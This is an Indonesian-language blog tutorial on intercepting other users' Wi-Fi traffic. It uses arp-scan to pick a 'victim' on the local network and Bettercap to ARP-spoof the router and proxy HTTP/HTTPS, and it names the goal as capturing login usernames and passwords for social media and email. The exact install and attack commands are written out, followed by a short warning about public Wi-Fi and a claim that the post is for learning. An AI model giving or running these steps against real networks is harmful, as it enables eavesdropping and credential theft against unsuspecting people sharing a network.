Tutorial Sniffing Wifi Menggunakan Bettercap
Sniffing Wifi Menggunakan Bettercap.
Hallo Kembali lagi dengan saya, maaf jika saya jarang update dikarenakan kesibukan yang bikin saya mendapatkan uang wkwk. Langsung saja saya akan share sesuai judul Tutorial Sniffing Wifi Menggunakan Bettercap. Tadinya saya akan berikan judul "Tutorial Sadap wifi" tetapi dipikir pikir judul nya merasa sedikit cringe haha. Banyak tools untuk melakukan sadap wifi/Middle man , contoh nya Wireshark(GUI), Bettercap(CLI),dll. Nah disini saya akan share sniffing wifi nya menggunakan Bettercap dengan tambahan ARP-Scan
Sebelum ke tutorial nya saya akan bahas terlebih dahulu
 |
| link gambar packet sniffing |
Apa itu Sniffing
Secara singkatnya adalah sniffing/snifer adalah sebuah kegiatan untuk mencari atau memantau sebuah paket data yang dikirimkan oleh target pada sebuah jaringan yang melawati sebuah protokol. Untuk mendapatkan sebuah informasi tersebut maka attacker akan membelokkan sebuah paket data/informasi pada Komputer attacker.Apa itu Bettercap
Bettercap termasuk software dengan kategori open source dan tool keamanan jaringan untuk serangan Man-In-The-Middle, aplikasi tersebut hanya berjalan pada jaringan LAN dengan kerja menganalisis suatu jaringan protocol computer dan menngumpulkan infotmasi paket yang dikirim dan di terima oleh computer. Teknik bettercap melakukan Intersep pada jaringan dan mengubah trafik pada sebuah segmen jaringan, menangkap password pada IP Host Target.Apa itu ARP-Scan
ARP-SCAN merupakan tools baris perintah (command line) atau CLI yangdigunakan untuk melihat identitas dari suatu host yg terhubung ke dala m suatu jaringan. Seperti : ip address, mac address, dan vendor dari hardware interface yg terhubung ke sebuah jaringan. Karena ancaman keamanan muncul ketika ada upaya manipulasi terhadap pengalamatan nomor IP dan MAC address. Proses ini biasa disebut dengan istilah ARP spoofing atau ARP poisoning, bertujuan untuk mencari mana saja komputer yang terhubung dengan koneksi terbuka (saling percaya).Tools
1. ARP-Scan2. Bettercap
Installasi
Install ARP-Scan
apt-get install arp-scan
Jika sudah di install, ketik
ifconfig
wlp2s0 merupakan interface wifi yg kita gunakan
Lalu kita jalankan arp-scan nya
arp-scan --interface=wlp2s0 --localnet
Setelah itu kalian pilih ip korban/ip yang akan kita sniffing
Install Bettercap
sudo apt install build-essential ruby-dev libpcap-dev net-tools
sudo apt install ruby
sudo gem install bettercap
sudo apt install ruby
sudo gem install bettercap
Harus berurutan ya, dari atas ke bawah :D
Untuk Menguji berhasil/tidak nya install bettercap, kalian ketikan command
sudo bettercap --help
Exploitasi
Oke dikarenakan kalian sudah mendapatkan ip target/korban dengan arp-scan tadi, sekarang kita melakukan exploitasi nya dengan command
sudo bettercap -X -G 192.168.1.1 --target 192.168.1.6 -S ARP --proxy --proxy-https
192.168.1.1 merupakan ip router
192.168.1.6 merupakan ip target/korban yang akan kita sniff
Tunggu korban login ke suatu situs/web, dan kita akan mendapatkan username dan password page login web dari kegiatan user/korban aktif mengakses url seperti media social, email dan lain-lain. hasil yang di dapat dari teknik sniffing sebagai berikut
Kesimpulan
Kesimpulan dari tutorial kali ini, yaitu dengan memanfaatkan wifi pubik(siapa saja boleh akses) kita(attacker) bisa mendapatkan data2 user/korban yang satu jaringan dengan kita(attacker). Jadi buat orang2 yang membaca ini ntah sebagai victim/user biasa, lebih baik menghindar dari menggunakan wifi public(seperti cafe,dll) untuk melakukan login ke suatu situs. Apalagi jika kita menggunakan mbanking menggunakan wifi public, sangat lah bahaya.
Saya share artikel seperti ini untuk pembelajaran semua orang saja, mudah-mudahan bermanfaat. Jika ada salah dalam penulisan, silahkan komentar saja nanti saya perbaiki jika memang itu salah😊
Untuk Versi Video nya silahkan ditonton
Terimakasih sudah membaca artikel ini~
Referensi
https://fit.labs.telkomuniversity.ac.id/mengenal-sniffing/
https://jurnal.uisu.ac.id/index.php/semnastek/article/viewFile/1359/1052
http://iswaroh13.blogspot.com/2016/06/menggunakan-arp-scan-untuk-mendeteksi.html
https://www.nakanosec.com/2020/04/sniffing-wifi-dengan-bettercap-targeting.html
